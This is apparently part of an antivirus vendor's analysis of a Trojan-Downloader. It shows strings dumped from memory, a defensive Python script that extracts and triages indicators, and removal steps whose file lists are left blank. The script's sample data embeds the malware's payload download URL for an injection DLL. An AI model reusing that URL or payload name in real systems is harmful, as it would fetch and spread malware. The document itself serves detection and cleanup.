Public Key Algorithm
Public Key Algorithm: %s
Signature: %s
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
Cert
KGS!@#$%server response timeout
LOGIN
Unsupported SASL authentication mechanism
0123456789-
SSPI error: %s failed: %s
rcmd
%s/%s
User was rejected by the SOCKS5 server (%u %u).
Invalid SSPI authentication response type (%u %u).
SOCKS5 server authencticated user %s with GSS-API.
SOCKS5 server supports GSS-API %s data protection.
Invalid SSPI encryption response type (%u %u).
SOCKS5 access with%s protection granted.
%s xxxxxxxxxxxxxxxx
user=%s
auth=Bearer %s
host=%s
port=%ld
operator
operator ""
IND)ind)Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
?#%X.y
%S#[k
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.gfids$x
.gfids$y
.tls$
.tls$ZZZ
KERNEL32.dll
USER32.dll
WS2_32.dll
CertFreeCertificateContext
ADVAPI32.dll
CRYPT32.dll
CryptDestroyKey
CryptImportKey
WLDAP32.dll
GetCPInfo
PeekNamedPipe
GetProcessHeap
.?AU_Crt_new_delete@std@@
libcurl/7.54.0 WinSSL
c:\%original file name%.exe
1'232]2{4
?"?&?*?.?2?6?
5"5&5*5.525
2=3g3
>$>(>,>0>
0 0$0(0,000
8 8$8(8,888
2 2$2(2,202
4 4(444\4
1 1@1`1|1
2 2<2@2`2
4 4@4`4|4
kernel32.dll
MmapApi.dll
mscoree.dll
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
__crt_strtox::floating_point_value::as_double
__crt_strtox::floating_point_value::as_float
ext-ms-win-ntuser-windowstation-l1-1-0
portuguese-brazilian
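Most of the strings above belong to a statically linked libcurl 7.54.0 built against Schannel (the "libcurl/7.54.0 WinSSL" marker), alongside the module names MmapApi.dll, kernel32.dll and mscoree.dll. The following Python is an added example, not the analysis system's code: it recovers ASCII and UTF-16LE strings from a memory dump the way `strings` does and triages them for the indicators that matter on this page (libcurl version, TLS backend, URLs, DLL names, CURLOPT_ names). SAMPLE_DUMP is a constructed excerpt, not the real process memory; the URL pattern also accepts the hxxp defanged form this report uses, and defang() writes URLs back out that way.

```python
import re

# Indicator patterns applied to every recovered string. The libcurl version and the
# "WinSSL" backend tag are what identify the statically linked HTTP client in this dump.
INDICATORS = [
    ("libcurl_version", re.compile(r"libcurl/(\d+\.\d+\.\d+)")),
    ("tls_backend",     re.compile(r"\b(WinSSL|Schannel|OpenSSL|mbedTLS|NSS)\b")),
    ("url",             re.compile(r"\b(?:https?|hxxps?)://[^\s\"'<>]+", re.I)),
    ("dll_name",        re.compile(r"\b[\w.-]+\.dll\b", re.I)),
    ("curl_option",     re.compile(r"\bCURLOPT_[A-Z_]+\b")),
]

def extract_strings(blob: bytes, min_len: int = 5):
    """Yield (offset, encoding, text) for ASCII and UTF-16LE runs of printable characters,
    the same runs `strings -a -e s` and `strings -a -e l` would report."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in wide_re.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")

def triage(blob: bytes, min_len: int = 5) -> dict:
    """Map indicator label -> sorted unique matches found anywhere in the dump."""
    hits = {}
    for _offset, _enc, text in extract_strings(blob, min_len):
        for label, pattern in INDICATORS:
            for m in pattern.finditer(text):
                hits.setdefault(label, set()).add(m.group(1) if m.groups() else m.group())
    return {label: sorted(values) for label, values in hits.items()}

def defang(url: str) -> str:
    """Render a URL the way this report does (hxxp://) so it is not clickable."""
    return re.sub(r"^http", "hxxp", url, flags=re.I)

# Constructed memory-dump excerpt: a few strings taken from the list above, separated by
# non-printable bytes, plus one UTF-16LE module name. Not a dump of the real process.
SAMPLE_DUMP = (
    b"\x00\x01\x02MZ\x90\x00"
    b"libcurl/7.54.0 WinSSL\x00\xff\xfe"
    b"http://reboot-hack.ru/api/storage/inject/MmapApi.dll?_v=205\x00\x80"
    b"CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!\x00\x00"
    + "kernel32.dll".encode("utf-16le") + b"\x00\x00\x7f"
)

if __name__ == "__main__":
    for label, values in triage(SAMPLE_DUMP).items():
        print(label, [defang(v) if label == "url" else v for v in values])
```

Running `triage` over a real dump (for example the output of a process-memory export from a sandbox) gives the same headline facts this section supports by hand: the curl build string, the TLS backend, the download URL and the DLL names. The UTF-16LE pass matters on Windows because module names and paths handed to the loader are frequently wide strings that an ASCII-only scan misses.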


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3708

  2. Delete the original Trojan-Downloader file.
  3. Delete or disinfect the following files created/modified by the Trojan-Downloader:

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
